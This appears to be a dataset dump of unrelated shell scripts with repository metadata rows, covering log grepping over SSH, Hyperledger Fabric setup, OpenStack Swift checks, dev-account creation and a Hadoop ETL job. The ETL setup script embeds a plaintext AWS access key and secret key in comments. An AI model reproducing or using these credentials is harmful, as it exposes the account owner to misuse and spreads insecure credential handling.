./create_indiv.pl -v $MULTI_VCF -o output
#--------------------------------------------------------------------------------
# 3 add genotype data to complete indiv vcf files. then generate filt and imputed files too. Requires long operations, so do it in parallel to speed it up
#-------------------------------------------------------------------------------
ls output/* | parallel -j 30 --gnu --verbose "./finish_indiv.pl -v $MULTI_VCF -d $DOSAGE -f {}"
| true |
dbcc796c49eec628267eb844b92c22db068cafae | Shell | youngzil/quickstart-framework | /quickstart-linux/docs/greplog2/greplog.sh | UTF-8 | 840 | 3.234375 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/bash
set -e
echo "#!/bin/bash">>temp.sh
mainAcct=$1
token=$2
function trusthost()
{
commandStr="cd /data/logs/aifgw-dmz-security;";
commandStr="${commandStr} grep -rn $mainAcct oauth2-server-error*.log >> ${host}.log;"
commandStr="${commandStr} grep -rn 'Token无效' oauth2-server-error*.log | grep $token >> ${host}.log;"
echo "ssh -t $host \" ${commandStr} \" &>/dev/null">>temp.sh
echo "scp $host:/data/logs/aifgw-dmz-security/${host}.log .;">>temp.sh
echo "ssh -t $host \"cd /data/logs/aifgw-dmz-security;rm -rf ${host}.log;\" &>/dev/null">>temp.sh
}
cat hostlist|while read line
do
host=`echo "$line"|awk '{print $1}'`
trusthost
done
echo "cat 10.72.*.log > merge.log ">>temp.sh
echo "rm 10.72.*.log ">>temp.sh
chmod +x *.sh
sh temp.sh
rm temp.sh
| true |
8c16a1bc5f7bfa6f2201524055b747a9ec6a7149 | Shell | akshu3398/sudoku | /docs/sudokugen/lib/games/makeindices.sh | UTF-8 | 183 | 3.125 | 3 | [] | no_license | #!/bin/sh
for dir in *; do
if [ -d "$dir" ]; then
find "$dir" -type f > "$dir.index"
fi
done
find */ -type f >Any.index
for i in *index; do echo -n $i; wc "$i"; done
| true |
4eb4093a2967b399d3f08264bf2f3044be6dcfe5 | Shell | aka00142/cfg2html-all | /sun/list_disks | UTF-8 | 1,866 | 3.5625 | 4 | [] | no_license | #!/bin/ksh
get_disk_lines () {
format <<-EOF | nawk '/^ *[0-9]+\. / {printf "%s %s\n", $2, $3}' | tr -d '<>'
EOF
}
calc_disk_size () {
# compute capacity using method for SATA disks.
# VTOC on most disks in a x4500 is different than most Sun servers
hd_size=`prtvtoc $dev_path 2> /dev/null |\
nawk '
/bytes.sector/ {B_per_sec = $2}
/accessible sec/ {sec = $2}
END { B = B_per_sec * sec;
GB = B / 1024 / 1024 / 1024;
printf "%d\n", GB}
'`
# if computation of disk space = 0, try alternate method...
# to parse other VTOC header format
if [ $hd_size -eq 0 ]; then
hd_size=`prtvtoc $dev_path 2> /dev/null |\
nawk '
/bytes.sector/ {B_per_sec = $2}
/sectors.track/ {sec_per_trk = $2}
/tracks.cylinder/ {trk_per_cyl = $2}
/[0-9] cylinders$/ {cyl = $2}
END {B = B_per_sec * sec_per_trk * trk_per_cyl * cyl;
GB = B / 1024 / 1024 / 1024;
printf "%d\n", GB}
'`
fi
printf "$disk $type $hd_size GB\n";
}
IFS='
'
printf "DEV TYPE SIZE\n";
for line in `get_disk_lines`; do
disk=`echo $line | awk '{print $1}'`;
type=`echo $line | awk '{print $2}'`;
done='false'
for slice in s0 s2 ""; do
dev_path=/dev/rdsk/${disk}${slice}
prtvtoc $dev_path >/dev/null 2>&1
if [ $? -eq 0 -a $done = 'false' ]; then
calc_disk_size
done='true'
fi
done
done
exit 0
#
| true |
9352b281b7adf51e1c40507891b6c3b61a3819a9 | Shell | heartbreaker1411/archlinux-pkgbuilds | /excat/PKGBUILD | UTF-8 | 499 | 2.5625 | 3 | [] | no_license | _p=excat
pkgname=${_p}
pkgver=0.3
pkgrel=1
pkgdesc="Tool to decompress any format using libarchive."
arch=('i686' 'x86_64')
url="http://excat.sf.net"
license=('BSD')
groups=()
depends=('libarchive')
makedepends=()
provides=()
conflicts=()
replaces=()
backup=()
options=(!emptydirs)
install=
source=(excat.c)
sha256sums=('f20099bbb3e27e2df5118319187ff05c0d56fb17a242db3a2a1ffb09121ee272')
build() {
cc -larchive excat.c -o excat
}
package() {
install -D -m0755 excat "${pkgdir}/usr/bin/excat"
}
| true |
c4aef32cfe064a140c13efe2756681325799eee1 | Shell | litx/fabric-samples | /first-network/scripts/script.sh | UTF-8 | 8,986 | 3.296875 | 3 | [
"Apache-2.0",
"CC-BY-4.0"
] | permissive | #!/bin/bash
echo
echo " ____ _____ _ ____ _____ "
echo "/ ___| |_ _| / \ | _ \ |_ _|"
echo "\___ \ | | / _ \ | |_) | | | "
echo " ___) | | | / ___ \ | _ < | | "
echo "|____/ |_| /_/ \_\ |_| \_\ |_| "
echo
echo "Build your first network (BYFN) end-to-end test"
echo
CHANNEL_NAME="$1"
DELAY="$2"
LANGUAGE="$3"
: ${CHANNEL_NAME:="mychannel"}
: ${TIMEOUT:="10"}
: ${LANGUAGE:="golang"}
LANGUAGE=`echo "$LANGUAGE" | tr [:upper:] [:lower:]`
COUNTER=1
MAX_RETRY=5
ORDERER_CA=/opt/gopath/src/github.com/hyperledger/fabric/peer/crypto/ordererOrganizations/example.com/orderers/orderer.example.com/msp/tlscacerts/tlsca.example.com-cert.pem
CC_SRC_PATH="github.com/chaincode/chaincode_example02/go/"
if [ "$LANGUAGE" = "node" ]; then
CC_SRC_PATH="/opt/gopath/src/github.com/chaincode/chaincode_example02/node/"
fi
echo "Channel name : "$CHANNEL_NAME
# verify the result of the end-to-end test
verifyResult () {
if [ $1 -ne 0 ] ; then
echo "!!!!!!!!!!!!!!! "$2" !!!!!!!!!!!!!!!!"
echo "========= ERROR !!! FAILED to execute End-2-End Scenario ==========="
echo
exit 1
fi
}
setGlobals () {
PEER=$1
ORG=$2
if [ $ORG -eq 1 ] ; then
CORE_PEER_LOCALMSPID="Org1MSP"
CORE_PEER_TLS_ROOTCERT_FILE=/opt/gopath/src/github.com/hyperledger/fabric/peer/crypto/peerOrganizations/org1.example.com/peers/peer0.org1.example.com/tls/ca.crt
CORE_PEER_MSPCONFIGPATH=/opt/gopath/src/github.com/hyperledger/fabric/peer/crypto/peerOrganizations/org1.example.com/users/Admin@org1.example.com/msp
if [ $PEER -eq 0 ]; then
CORE_PEER_ADDRESS=peer0.org1.example.com:7051
else
CORE_PEER_ADDRESS=peer1.org1.example.com:7051
fi
elif [ $ORG -eq 2 ] ; then
CORE_PEER_LOCALMSPID="Org2MSP"
CORE_PEER_TLS_ROOTCERT_FILE=/opt/gopath/src/github.com/hyperledger/fabric/peer/crypto/peerOrganizations/org2.example.com/peers/peer0.org2.example.com/tls/ca.crt
CORE_PEER_MSPCONFIGPATH=/opt/gopath/src/github.com/hyperledger/fabric/peer/crypto/peerOrganizations/org2.example.com/users/Admin@org2.example.com/msp
if [ $PEER -eq 0 ]; then
CORE_PEER_ADDRESS=peer0.org2.example.com:7051
else
CORE_PEER_ADDRESS=peer1.org2.example.com:7051
fi
fi
env |grep CORE
}
createChannel() {
setGlobals 0 0
if [ -z "$CORE_PEER_TLS_ENABLED" -o "$CORE_PEER_TLS_ENABLED" = "false" ]; then
peer channel create -o orderer.example.com:7050 -c $CHANNEL_NAME -f ./channel-artifacts/channel.tx >&log.txt
else
peer channel create -o orderer.example.com:7050 -c $CHANNEL_NAME -f ./channel-artifacts/channel.tx --tls $CORE_PEER_TLS_ENABLED --cafile $ORDERER_CA >&log.txt
fi
res=$?
cat log.txt
verifyResult $res "Channel creation failed"
echo "===================== Channel \"$CHANNEL_NAME\" is created successfully ===================== "
echo
}
updateAnchorPeers() {
PEER=$1
ORG=$2
setGlobals $PEER $ORG
if [ -z "$CORE_PEER_TLS_ENABLED" -o "$CORE_PEER_TLS_ENABLED" = "false" ]; then
peer channel update -o orderer.example.com:7050 -c $CHANNEL_NAME -f ./channel-artifacts/${CORE_PEER_LOCALMSPID}anchors.tx >&log.txt
else
peer channel update -o orderer.example.com:7050 -c $CHANNEL_NAME -f ./channel-artifacts/${CORE_PEER_LOCALMSPID}anchors.tx --tls $CORE_PEER_TLS_ENABLED --cafile $ORDERER_CA >&log.txt
fi
res=$?
cat log.txt
verifyResult $res "Anchor peer update failed"
echo "===================== Anchor peers for org \"$CORE_PEER_LOCALMSPID\" on \"$CHANNEL_NAME\" is updated successfully ===================== "
sleep $DELAY
echo
}
## Sometimes Join takes time hence RETRY at least for 5 times
joinWithRetry () {
PEER=$1
ORG=$2
peer channel join -b $CHANNEL_NAME.block >&log.txt
res=$?
cat log.txt
if [ $res -ne 0 -a $COUNTER -lt $MAX_RETRY ]; then
COUNTER=` expr $COUNTER + 1`
echo "peer${PEER}.org${ORG} failed to join the channel, Retry after $DELAY seconds"
sleep $DELAY
joinWithRetry $PEER $ORG
else
COUNTER=1
fi
verifyResult $res "After $MAX_RETRY attempts, peer${PEER}.org${ORG} has failed to Join the Channel"
}
joinChannel () {
for org in 1 2; do
for peer in 0 1; do
setGlobals $peer $org
joinWithRetry $peer $org
echo "===================== peer${peer}.org${org} joined on the channel \"$CHANNEL_NAME\" ===================== "
sleep $DELAY
echo
done
done
}
installChaincode () {
PEER=$1
ORG=$2
setGlobals $PEER $ORG
peer chaincode install -n mycc -v 1.0 -l ${LANGUAGE} -p ${CC_SRC_PATH} >&log.txt
res=$?
cat log.txt
verifyResult $res "Chaincode installation on peer${PEER}.org${ORG} has Failed"
echo "===================== Chaincode is installed on peer${PEER}.org${ORG} ===================== "
echo
}
instantiateChaincode () {
PEER=$1
ORG=$2
setGlobals $PEER $ORG
# while 'peer chaincode' command can get the orderer endpoint from the peer (if join was successful),
# lets supply it directly as we know it using the "-o" option
if [ -z "$CORE_PEER_TLS_ENABLED" -o "$CORE_PEER_TLS_ENABLED" = "false" ]; then
peer chaincode instantiate -o orderer.example.com:7050 -C $CHANNEL_NAME -n mycc -l ${LANGUAGE} -v 1.0 -c '{"Args":["init","a","100","b","200"]}' -P "OR ('Org1MSP.member','Org2MSP.member')" >&log.txt
else
peer chaincode instantiate -o orderer.example.com:7050 --tls $CORE_PEER_TLS_ENABLED --cafile $ORDERER_CA -C $CHANNEL_NAME -n mycc -l ${LANGUAGE} -v 1.0 -c '{"Args":["init","a","100","b","200"]}' -P "OR ('Org1MSP.member','Org2MSP.member')" >&log.txt
fi
res=$?
cat log.txt
verifyResult $res "Chaincode instantiation on peer${PEER}.org${ORG} on channel '$CHANNEL_NAME' failed"
echo "===================== Chaincode Instantiation on peer${PEER}.org${ORG} on channel '$CHANNEL_NAME' is successful ===================== "
echo
}
chaincodeQuery () {
PEER=$1
ORG=$2
setGlobals $PEER $ORG
EXPECTED_RESULT=$3
echo "===================== Querying on peer${PEER}.org${ORG} on channel '$CHANNEL_NAME'... ===================== "
local rc=1
local starttime=$(date +%s)
# continue to poll
# we either get a successful response, or reach TIMEOUT
while test "$(($(date +%s)-starttime))" -lt "$TIMEOUT" -a $rc -ne 0
do
sleep $DELAY
echo "Attempting to Query peer${PEER}.org${ORG} ...$(($(date +%s)-starttime)) secs"
peer chaincode query -C $CHANNEL_NAME -n mycc -c '{"Args":["query","a"]}' >&log.txt
test $? -eq 0 && VALUE=$(cat log.txt | awk '/Query Result/ {print $NF}')
test "$VALUE" = "$EXPECTED_RESULT" && let rc=0
done
echo
cat log.txt
if test $rc -eq 0 ; then
echo "===================== Query on peer${PEER}.org${ORG} on channel '$CHANNEL_NAME' is successful ===================== "
else
echo "!!!!!!!!!!!!!!! Query result on peer${PEER}.org${ORG} is INVALID !!!!!!!!!!!!!!!!"
echo "================== ERROR !!! FAILED to execute End-2-End Scenario =================="
echo
exit 1
fi
}
chaincodeInvoke () {
PEER=$1
ORG=$2
setGlobals $PEER $ORG
# while 'peer chaincode' command can get the orderer endpoint from the peer (if join was successful),
# lets supply it directly as we know it using the "-o" option
if [ -z "$CORE_PEER_TLS_ENABLED" -o "$CORE_PEER_TLS_ENABLED" = "false" ]; then
peer chaincode invoke -o orderer.example.com:7050 -C $CHANNEL_NAME -n mycc -c '{"Args":["invoke","a","b","10"]}' >&log.txt
else
peer chaincode invoke -o orderer.example.com:7050 --tls $CORE_PEER_TLS_ENABLED --cafile $ORDERER_CA -C $CHANNEL_NAME -n mycc -c '{"Args":["invoke","a","b","10"]}' >&log.txt
fi
res=$?
cat log.txt
verifyResult $res "Invoke execution on peer${PEER}.org${ORG} failed "
echo "===================== Invoke transaction on peer${PEER}.org${ORG} on channel '$CHANNEL_NAME' is successful ===================== "
echo
}
## Create channel
echo "Creating channel..."
createChannel
## Join all the peers to the channel
echo "Having all peers join the channel..."
joinChannel
## Set the anchor peers for each org in the channel
echo "Updating anchor peers for org1..."
updateAnchorPeers 0 1
echo "Updating anchor peers for org2..."
updateAnchorPeers 0 2
## Install chaincode on peer0.org1 and peer0.org2
echo "Installing chaincode on peer0.org1..."
installChaincode 0 1
echo "Install chaincode on peer0.org2..."
installChaincode 0 2
# Instantiate chaincode on peer0.org2
echo "Instantiating chaincode on peer0.org2..."
instantiateChaincode 0 2
# Query chaincode on peer0.org1
echo "Querying chaincode on peer0.org1..."
chaincodeQuery 0 1 100
# Invoke chaincode on peer0.org1
echo "Sending invoke transaction on peer0.org1..."
chaincodeInvoke 0 1
## Install chaincode on peer1.org2
echo "Installing chaincode on peer1.org2..."
installChaincode 1 2
# Query on chaincode on peer1.org2, check if the result is 90
echo "Querying chaincode on peer1.org2..."
chaincodeQuery 1 2 90
echo
echo "========= All GOOD, BYFN execution completed =========== "
echo
echo
echo " _____ _ _ ____ "
echo "| ____| | \ | | | _ \ "
echo "| _| | \| | | | | | "
echo "| |___ | |\ | | |_| | "
echo "|_____| |_| \_| |____/ "
echo
exit 0
| true |
a68adf49bcf2fc0d6b2b6677a3bb168408d60375 | Shell | dbca-wa/authome | /testmonitoring | UTF-8 | 597 | 2.90625 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/bash
if [[ "$1" == "" ]]
then
backend="false"
elif [[ "$1" == "true" ]]
then
backend="true"
else
backend="false"
fi
TEST_RUNNER=authome.testrunners.NoDatabaseTestRunner
export TEST_RUNNER
#source venv/bin/activate && python manage.py test authome --keepdb
if [[ "$backend" == "true" ]]
then
export IGNORE_LOADING_ERROR=True ; poetry run python manage.py test authome --keepdb --pattern="testmonitoring.py" > ./logs/testmonitoring.log 2>&1 &
else
export IGNORE_LOADING_ERROR=True ; poetry run python manage.py test authome --keepdb --pattern="testmonitoring.py"
fi
| true |
ee0d2d2fb0df1e54bf78770f27824be7d61484d0 | Shell | Ninad-cloud/autovm | /swift_verify.sh | UTF-8 | 2,219 | 3.21875 | 3 | [] | no_license | #######[ DEPLYOMENT OF SWIFT-OBJECT STORAG ESERVICE ]########################
#Verification for SWIFT-OBJECT
# Swift Service uses Distributed SQlite Databases
#!/bin/sh
source /root/autovm/globalvar.sh
verfiy_operation(){
# Verify the operation
echo -e "\n\e[36m[ SWIFT_ON_CONTROLLER ] :\e[0m VERIFYING THE SWIFT SERVICE DEPLOYMENT"
service swift-proxy restart
###Source the demo credentials
source ./demo-openrc
echo "$OS_PROJECT_DOMAIN_NAME"
echo "$OS_PROJECT_NAME"
echo "$OS_USER_DOMAIN_NAME"
echo "$OS_USERNAME"
echo "$OS_PASSWORD"
echo "$OS_AUTH_URL"
echo "$OS_IDENTITY_API_VERSION"
echo "$OS_IMAGE_API_VERSION"
echo "---swift stat"
swift stat
sleep 2
if openstack container list | grep container1;then
echo "Container Already Created...!!!"
else
echo "openstack container create container1"
openstack container create container1
fi
#openstack container create container1
echo "This is for Demo Purpose..." > test_file.txt
###Source the demo credentials
source ./demo-openrc
echo "$OS_PROJECT_DOMAIN_NAME"
echo "$OS_PROJECT_NAME"
echo "$OS_USER_DOMAIN_NAME"
echo "$OS_USERNAME"
echo "$OS_PASSWORD"
echo "$OS_AUTH_URL"
echo "$OS_IDENTITY_API_VERSION"
echo "$OS_IMAGE_API_VERSION"
echo "openstack object create container1"
openstack object create container1 test_file.txt
sleep 5
for i in 1 2 3;
do
if openstack object list container1 | grep test_file.txt;then
break
else
echo -e "\nRound $i of list container"
sleep 5
fi
done
echo "create test directory"
mkdir test
cd test
openstack object save container1 test_file.txt
echo "..See The Result..."
cat test_file.txt
###Source the demo credentials
source ./demo-openrc
echo "$OS_PROJECT_DOMAIN_NAME"
echo "$OS_PROJECT_NAME"
echo "$OS_USER_DOMAIN_NAME"
echo "$OS_USERNAME"
echo "$OS_PASSWORD"
echo "$OS_AUTH_URL"
echo "$OS_IDENTITY_API_VERSION"
echo "$OS_IMAGE_API_VERSION"
echo "Verify The Operation....."
if openstack object list container1 | grep test_file.txt;then
echo -e "\n\e[36m#####[ SUCCESSFULLY DEPLOYED SWIFT SERVICE ]######## \e[0m\n"
else
echo -e "\n\e[31m##### SWIFT SERVICE FAILED, EXITING..!! ########### \e[0m\n"
exit
fi
}
verfiy_operation | true |
fcf5391388b537f4e83131b21294d54ec4a3c076 | Shell | xmanswer/Web-Service-Twitter-Analytics | /phase1/phase1_query2_etl/preparation.sh | UTF-8 | 3,164 | 2.53125 | 3 | [] | no_license | sudo apt-get update
sudo apt-get install python-pip
# configue cli
sudo pip install awscli
aws configure
## AWSAccessKeyId=AKIAJWVJUGINPZKLNC5A
## AWSSecretKey=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
## default region = us-east-1
## default format = txt
# copy subsample
aws s3 ls s3://cmucc-datasets/twitter/f15/
sudo apt-get install s3cmd
s3cmd --configure
# configure s3cmd
## Access Key: AKIAJWVJUGINPZKLNC5A
## Secret Key: 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
## Encryption password: hmm
## Path to GPG program [/usr/bin/gpg]: /usr/bin/gpg
## Use HTTPS protocol [No]: False
## HTTP Proxy server name:
## Test access with supplied credentials? [Y/n] y
## Save settings? [y/N] y
s3cmd cp s3://cmucc-datasets/twitter/f15/part-00000 s3://phase1elt/input/
# prepare emr
cd ~/
mkdir etl
sudo apt-get install openjdk-7-jdk
# scp mapper and reducer source code, gson jars, the afinn and banned txt, and a tiny sample subset3.txt to etl
export CLASSPATH=$CLASSPATH:~/etl/gson-2.4-javadoc.jar:~/etl/gson-2.4-sources.jar:~/etl/gson-2.4.jar
javac *.java
jar -cvf ETL.jar *.class
# test mapper and reducer on the single machine
# cat subset3.txt | java ETLMapperPhase1 "/home/ubuntu/etl/afinn.txt" "/home/ubuntu/etl/banned.txt"
cat subset3.txt | java -Duser.timezone=GMT ETLMapperPhase1_v2 /home/ubuntu/etl/afinn.txt /home/ubuntu/etl/banned.txt |sort| java -Duser.timezone=GMT ETLReducerPhase1_v2
# go to emr console, customize the streaming as follows
# using command-runner.jar as JAR location
hadoop-streaming -files s3://phase1elt/src/ETL.jar,s3://phase1elt/src/gson-2.4.jar,s3://phase1elt/src/gson-2.4-javadoc.jar,s3://phase1elt/src/gson-2.4-sources.jar,s3://phase1elt/src/afinn.txt,s3://phase1elt/src/banned.txt -mapper "java -classpath ETL.jar:gson-2.4.jar:gson-2.4-javadoc.jar:gson-2.4-sources.jar ETLMapperPhase1 afinn.txt banned.txt" -reducer "java -classpath ETL.jar:gson-2.4.jar:gson-2.4-javadoc.jar:gson-2.4-sources.jar ETLReducerPhase1" -input s3://phase1elt/input/ -output s3://phase1elt/output/ -cmdenv LC_CTYPE=en_GB.UTF-8
hadoop-streaming -files s3://phase1elt/src/ETL_v2.jar,s3://phase1elt/src/gson-2.4.jar,s3://phase1elt/src/gson-2.4-javadoc.jar,s3://phase1elt/src/gson-2.4-sources.jar,s3://phase1elt/src/afinn.txt,s3://phase1elt/src/banned.txt -mapper "java -Duser.timezone=GMT -classpath ETL_v2.jar:gson-2.4.jar:gson-2.4-javadoc.jar:gson-2.4-sources.jar ETLMapperPhase1_v2 afinn.txt banned.txt" -reducer "java -Duser.timezone=GMT -classpath ETL_v2.jar:gson-2.4.jar:gson-2.4-javadoc.jar:gson-2.4-sources.jar ETLReducerPhase1_v2" -input s3://phase1elt/input/ -output s3://phase1elt/output_v2/ -cmdenv LC_CTYPE=en_GB.UTF-8
hadoop-streaming -files s3://phase1elt/src/ETL_v3.jar,s3://phase1elt/src/gson-2.4.jar,s3://phase1elt/src/gson-2.4-javadoc.jar,s3://phase1elt/src/gson-2.4-sources.jar,s3://phase1elt/src/afinn.txt,s3://phase1elt/src/banned.txt -mapper "java -Duser.timezone=GMT -classpath ETL_v3.jar:gson-2.4.jar:gson-2.4-javadoc.jar:gson-2.4-sources.jar ETLMapperPhase1_v3 afinn.txt banned.txt" -reducer "java -Duser.timezone=GMT -classpath ETL_v3.jar:gson-2.4.jar:gson-2.4-javadoc.jar:gson-2.4-sources.jar ETLReducerPhase1_v3" -input s3://cmucc-datasets/twitter/f15/ -output s3://phase1elt/output_full_v3/ -cmdenv LC_CTYPE=en_GB.UTF-8 | true |
a13433b83d6398497fb5b764240cebfd25700dce | Shell | hacone/hc_temporary | /34samples-scripts/progress.sh | UTF-8 | 789 | 2.90625 | 3 | [] | no_license | #!/bin/bash
echo -e "\nno. of CHUNKS."
for dir in $(ls filtered/ ); do echo -e "${dir}\t"$( ls filtered/$dir/split/ | wc -l ); done
#echo -e "\nfinished ENCODING"
#echo -e "> For s14-X17"
#for s in $(ls *-s14-encode.log); do echo $s ; grep Done $s | wc -l ; done
#echo -e "> For 14 mons"
#for s in $(ls *-14m-encode.log); do echo $s ; grep Done $s | wc -l ; done
for sample in $( ls /glusterfs/hacone/blast-tmp/ ); do
echo "Alignment for $sample : "$( ls -lah /glusterfs/hacone/blast-tmp/$sample/*/*.sort.read.sam.gz | wc -l )
ls -lahS /glusterfs/hacone/blast-tmp/$sample/*/*.sort.read.sam.gz
echo "Encoding for $sample : "$( ls -lah /glusterfs/hacone/blast-tmp/$sample/*/*.pickle | wc -l )
ls -lahS /glusterfs/hacone/blast-tmp/$sample/*/*.pickle
done
| true |
da26980e354ce8353ae915232b5d4d61b972b856 | Shell | FHead/PhysicsHIJetReco2018 | /CommonCode/script/ScaleHistogramsWithTag.sh | UTF-8 | 820 | 3.09375 | 3 | [] | no_license |
WorkspaceBase=~/work/PhysicsWorkspace/HIJetMass/
InputFolder=CombinedResult
OutputFolder=ScaledResult
CrossSectionFile=$WorkspaceBase/CommonCode/input/SampleCrossSection.input
mkdir -p $OutputFolder
for i in `ls $InputFolder`
do
Tag=${i/.root}
InputFile=$InputFolder/$i
OutputFile=$OutputFolder/$i
if grep -q $Tag $CrossSectionFile
then
CrossSection=`grep $Tag $CrossSectionFile | awk '{print $2}'`
if [ "$CrossSection" != "-1" ]
then
$WorkspaceBase/CommonCode/bin/ScaleHistograms $InputFile $OutputFile $CrossSection $Tag
else
$WorkspaceBase/CommonCode/bin/AttachTags $InputFile ${OutputFile/.root/_NoCrossSection.root} $Tag
fi
else
$WorkspaceBase/CommonCode/bin/AttachTags $InputFile ${OutputFile/.root/_NoSuchSample.root} $Tag
fi
done
| true |
13edef84d94931925842d3cab4e380bee1d86b11 | Shell | jrsouth/Scripts | /createdevuser.sh | UTF-8 | 5,214 | 4 | 4 | [] | no_license | #!/bin/bash
# -----------------------------------------------------------------------------
# Script to set up dev accounts on a web development machine
#
# Creates:
# -- User SSH login
# -- FTP access to home directory (assumes this is available with login creation)
# -- MySQL access to username_* databases (plus .my.cnf file in home directory)
# -- Self-signed SSL key/certificate in ~/.ssl[/certs]
# -- Apache config file (enabled, with graceful reload)
#
# Assumes:
# -- Valid /root/.my.cnf file to enable mysql user creation
# -- Wildcard DNS entry for $SERVERDOMAIN variable (defined below these notes)
# -- chroot'd FTP access for user accounts by default
# -- Apache2 web server correctly configured and running
#
# Issues
# -- No real security (passwords in command history, but are expected to be changed)
# -- No real error-checking, assumes success unless catastrophic failure
# -----------------------------------------------------------------------------
# ------ Variables ------
# Used for apache config file setup
SERVERDOMAIN="domain.com"
# Used for self-signed certificates
SSLCOUNTRY="GB"
SSLSTATE="London"
SSLLOCATION="London"
SSLORGANISATION="Organisation"
# ------ End variables ------
# Check run as root
if [ $EUID -ne 0 -o $UID -ne 0 ]
then
echo -e "Error - must be root.\nUsage: createdevuser.sh username password\n" ;
exit 1 ;
fi
# Check username and password arguments provided
if [ $# -ne 2 ]
then
echo -e "Error - incorrect number of parameters\nUsage: createdevuser.sh username password\n" ;
exit 2 ;
fi
# Set up human-readable variables from command line arguments
NEWUSER=$1 ;
NEWPASS=$2 ;
NEWPASS_CRYPT=`openssl passwd -1 $NEWPASS` ;
# Check for existing user
egrep "^$NEWUSER" /etc/passwd >/dev/null
if [ $? -eq 0 ]; then
echo -e "Error - user $NEWUSER already exists." ;
exit 3 ;
fi
# Confirm creation
read -s -n 1 -p "Create new user \"$NEWUSER\" with password \"$NEWPASS\"? (y/n)" CONFIRM ; echo ;
if [ "$CONFIRM" != "y" ]
then
echo -e "\nCancelled." ;
exit 4 ;
else
echo -e "\nProcessing:" ;
fi
# Create local user
echo -e -n "Creating local user..."
useradd -m --shell=/bin/bash -p "$NEWPASS_CRYPT" $NEWUSER ;
echo -e -n "Done.\n"
# Create samba user
# Not needed for external host
#echo -e -n "Creating SAMBA user..."
### Should use inline herestring: <<< "
#(echo -e -n "$NEWPASS\n$NEWPASS\n") | sudo smbpasswd -a -s $NEWUSER > /dev/null;
#echo -e -n "$NEWUSER = \"$NEWUSER\"\n" >> /etc/samba/smbusers ;
#echo -e -n "Done.\n"
# Create FTP User
# Actually implicit with succesful user creation but nice to see in the output
echo -e -n "Creating FTP user..."
echo -e -n "Done.\n"
# Create mysql user and .my.cnf file
echo -e -n "Creating mysql user..."
mysql --defaults-extra-file="/root/.my.cnf" -e "GRANT ALL ON \`${NEWUSER}_%\`.* to '$NEWUSER'@'localhost' IDENTIFIED BY '$NEWPASS';" ;
echo -ne "[client]\nuser=$NEWUSER\npassword=$NEWPASS\n" > /home/$NEWUSER/.my.cnf
chown $NEWUSER:$NEWUSER /home/$NEWUSER/.my.cnf
echo -e -n "Done.\n"
# Create self-signed key/certificate for HTTPS
echo -e -n "Creating self-signed SSL certficates..."
mkdir -p /home/$NEWUSER/.ssl/certs
openssl req -nodes -newkey rsa:2048 -x509 -days 1825 \
-subj "/C=$SSLCOUNTRY/ST=$SSLSTATE/L=$SSLLOCATION/O=$SSLORGANISATION/CN=$NEWUSER.$SERVERDOMAIN" \
-keyout /home/$NEWUSER/.ssl/$NEWUSER.$SERVERDOMAIN.key \
-out /home/$NEWUSER/.ssl/certs/$NEWUSER.$SERVERDOMAIN.crt \
> /dev/null 2>&1
chown -R $NEWUSER:$NEWUSER /home/$NEWUSER/.ssl
echo -e -n "Done.\n"
# Create apache site .conf file
# Done inline to keep script self-contained, but maybe not best option for flexibility
echo -e -n "Creating Apache site config file..."
cat > /etc/apache2/sites-available/$NEWUSER.$SERVERDOMAIN.conf <<EOF
<VirtualHost *:80>
ServerName $NEWUSER.$SERVERDOMAIN
ServerAdmin $NEWUSER@$SERVERDOMAIN
DocumentRoot /home/$NEWUSER/public_html
LogLevel warn
ErrorLog \${APACHE_LOG_DIR}/error.$NEWUSER.$SERVERDOMAIN.log
CustomLog \${APACHE_LOG_DIR}/access.$NEWUSER.$SERVERDOMAIN.log combined
<Directory />
Options FollowSymLinks
AllowOverride None
</Directory>
<Directory /home/$NEWUSER/public_html/>
Options All
AllowOverride All
Require all granted
</Directory>
</VirtualHost>
<VirtualHost *:443>
ServerName $NEWUSER.$SERVERDOMAIN
ServerAdmin $NEWUSER@$SERVERDOMAIN
DocumentRoot /home/$NEWUSER/public_html
SSLEngine on
SSLCertificateFile /home/$NEWUSER/.ssl/certs/$NEWUSER.$SERVERDOMAIN.crt
SSLCertificateKeyFile /home/$NEWUSER/.ssl/$NEWUSER.$SERVERDOMAIN.key
</VirtualHost>
EOF
echo -e -n "Done.\n"
echo -e -n "Enabling Apache site config file..."
a2ensite $NEWUSER.$SERVERDOMAIN > /dev/null 2>&1
echo -e -n "Done.\n"
echo -e -n "Loading Apache site config file..."
mkdir -p /home/$NEWUSER/public_html # Make sure folder is there so `apache2ctl configtest` is happy
apache2ctl configtest > /dev/null 2>&1 && apache2ctl graceful > /dev/null 2>&1
echo -e -n "Done.\n"
# Complete
echo -e "\nUser creation complete." ;
echo "--> $NEWUSER.$SERVERDOMAIN is served from /home/$NEWUSER/public_html (which can be a symlink)" ;
exit 0 ;
| true |
af03b7ff43b821f5dcbd7167065085b49d363cb0 | Shell | ammpedro/cloudsim-ed-actuation | /deploy.bash | UTF-8 | 677 | 2.609375 | 3 | [] | no_license | #!/bin/bash
. /opt/ros/groovy/setup.bash
. /opt/ros/hydro/setup.bash
echo "Creating directories..."
mkdir ~/code
mkdir ~/cloudsim/notebook
cd ~/code
mkdir ws
mkdir ws/src
cd ws/src
echo "Transfer repo..."
cp -r ~/cloudsim-ed-actuation ~/code/ws/src
echo "Initializing catkin workspace"
catkin_init_workspace
cd ..
echo "Building catkin workspace"
catkin_make install
. devel/setup.bash
. install/share/cloudsim_ed_actuation/setupx.bash
echo "Webify models for gzweb"
. ~/cloudsim/gzweb/deploy.sh -m local
echo "Setup Notebooks"
cp -r src/cloudsim-ed-actuation/cloudsim_ed_actuation/notebooks/. ~/cloudsim/notebook/
echo "Delete repo files"
rm -r ~/cloudsim-ed-actuation
| true |
d4190a2a336186a3c3f85841fbdccac52fc1371d | Shell | faizainur/catena-fabric | /organizations/ccp-generate.sh | UTF-8 | 2,109 | 3.375 | 3 | [] | no_license | #!/bin/bash
function one_line_pem {
echo "`awk 'NF {sub(/\\n/, ""); printf "%s\\\\\\\n",$0;}' $1`"
}
function json_ccp {
local PP=$(one_line_pem $4)
local CP=$(one_line_pem $5)
sed -e "s/\${ORG}/$1/" \
-e "s/\${P0PORT}/$2/" \
-e "s/\${CAPORT}/$3/" \
-e "s#\${PEERPEM}#$PP#" \
-e "s#\${CAPEM}#$CP#" \
organizations/ccp-template.json
}
function yaml_ccp {
local PP=$(one_line_pem $4)
local CP=$(one_line_pem $5)
sed -e "s/\${ORG}/$1/" \
